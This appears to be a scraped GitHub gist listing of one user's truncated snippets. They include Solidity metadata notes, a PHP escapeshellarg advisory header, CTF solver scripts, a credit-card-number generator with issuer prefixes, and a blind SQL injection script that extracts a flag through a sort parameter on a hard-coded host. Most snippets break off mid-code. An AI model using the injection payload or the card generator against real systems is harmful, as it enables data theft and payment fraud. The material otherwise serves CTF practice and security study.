Khanh Ta Quang tqkve
@tqkve
tqkve / solidity metadata
Created February 10, 2023 10:06
metadata that solidity compiler added to contract's runtime bytecode
>= v0.4.17
0xa1 0x65 'b' 'z' 'z' 'r' '0' 0x58 0x20 <32 bytes swarm hash> 0x00 0x29
>= 0.5.9
0xa2
0x65 'b' 'z' 'z' 'r' '0' 0x58 0x20 <32 bytes swarm hash>
0x64 's' 'o' 'l' 'c' 0x43 <3 byte version encoding>
0x00 0x32
>= 0.5.12
import lief
def wthash(name):
    # Materialize the code points so len() and indexing also work on Python 3
    name = list(map(ord, name))
    hash = 0
    x = 0
    y = 0
    for i in range(len(name)):
        x = x & 0xffffff00 | name[i]
        y = x & 0xf
@tqkve
tqkve / escapeshellrce.md
Created December 6, 2017 14:50 — forked from Zenexer/escapeshellrce.md
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure

Paul Buonopane [email protected] at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

import socket
import random
from base64 import b64decode as bd,b64encode as be
HOST = "flatearth.fluxfingers.net"
# HOST = "localhost"
PORT = 1718
def ru(s, end):
    res = ""
@tqkve
tqkve / cvv.py
Created September 18, 2017 11:31
import random
visaPrefix = ["4539", "4556", "4916", "4532", "4929", "40240071", "4485", "4716", "4"]
mcPrefix = ["51", "52", "53", "54", "55"]
amexPrefix = ["34", "37"]
disPrefix = ["6011"]
dinnerPrefix = ["300", "301", "302", "303", "36", "38"]
def get_last_digit(ccn):
    length = len(ccn) + 1
#include "stdafx.h"
#include <stdio.h>
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <string>
#pragma comment (lib,"ws2_32.lib")
/*
example of the compression algorithm:
original: abacadae (8 bytes)
max char = a (appears 4 times)
<?php
/*
* webadmin.php - a simple Web-based file manager
* Copyright (C) 2004-2011 Daniel Wacker [daniel dot wacker at web dot de]
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
import sys
import zipfile
import os
'''
usage: python extract.py EXE_file
'''
def extract(filename):
    zf = zipfile.ZipFile(filename)
    f = open('test1.exe', 'wb')
    f.write(zf.read(filename))
from Crypto.Cipher import AES
arr = [146, 108, 15, 234, 5, 175, 214, 95, 89, 49, 210, 154, 156, 107, 63, 156,153, 221, 77, 116, 82, 151, 18, 214, 136, 34, 18, 174, 172, 217, 53, 29]
cmp = [40, 164, 61, 120, 84, 234, 165, 53, 142, 239, 147, 112, 88, 228, 226, 148]
key = bytearray(16)
j = 0
for i in xrange(len(arr)):
    if i % 2 == 0:
        key[j] = arr[i] + 2
        j += 1
@tqkve
tqkve / web100.py
Last active October 4, 2015 02:49
web100 kma ctf
import requests
true_resp = requests.get('http://128.199.183.44/web100/index.php?sort=rand%28true%29--%20-').text
flag = ''
for i in range(1,50):
    print('Testing char {}'.format(i))
    for j in range(32,127):
        resp = requests.get('http://128.199.183.44/web100/index.php?sort=rand(ascii(substr((select value from `values` limit 0,1),{},1)) = {})-- -'.format(i, j)).text
        if resp == true_resp:
            flag += chr(j)